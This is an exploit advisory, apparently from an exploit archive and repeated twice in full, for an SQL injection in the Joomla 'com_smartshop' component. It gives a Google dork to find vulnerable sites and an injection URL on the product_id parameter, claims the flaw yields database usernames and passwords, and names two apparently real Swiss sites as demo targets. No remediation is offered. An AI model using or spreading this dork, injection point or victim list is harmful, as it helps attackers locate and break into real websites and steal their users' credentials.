-------------------------------------------------------------------
Joomla Component - smartshop SQL Injection Vulnerability
-------------------------------------------------------------------
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"com_smartshop"
# Tested on : Windows 7 , Backtrack 5r3
####
#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password ...
------------------
#=> SQL Injection
http://[target]/[path]/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=[ID]&catid=[ID]&product_id=25'[inj3ct h3re]
------------------------------
#=> Demos :
http://www.aktenvernichter.ch/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=1&catid=12&product_id=242
http://www.destructeurs.ch/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=147&catid=4&product_id=35
------------------------------ <= Th3 End ^_^'
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Joomla Component - smartshop SQL Injection Vulnerability
-------------------------------------------------------------------
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"com_smartshop"
# Tested on : Windows 7 , Backtrack 5r3
####
#=> Exploit Info :
------------------
# The attacker can access to the database & get username & password ...
------------------
#=> SQL Injection
http://[target]/[path]/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=[ID]&catid=[ID]&product_id=25'[inj3ct h3re]
------------------------------
#=> Demos :
http://www.aktenvernichter.ch/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=1&catid=12&product_id=242
http://www.destructeurs.ch/index.php?option=com_smartshop&controller=smartshop_products&task=details&parentid=147&catid=4&product_id=35
------------------------------ <= Th3 End ^_^'
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information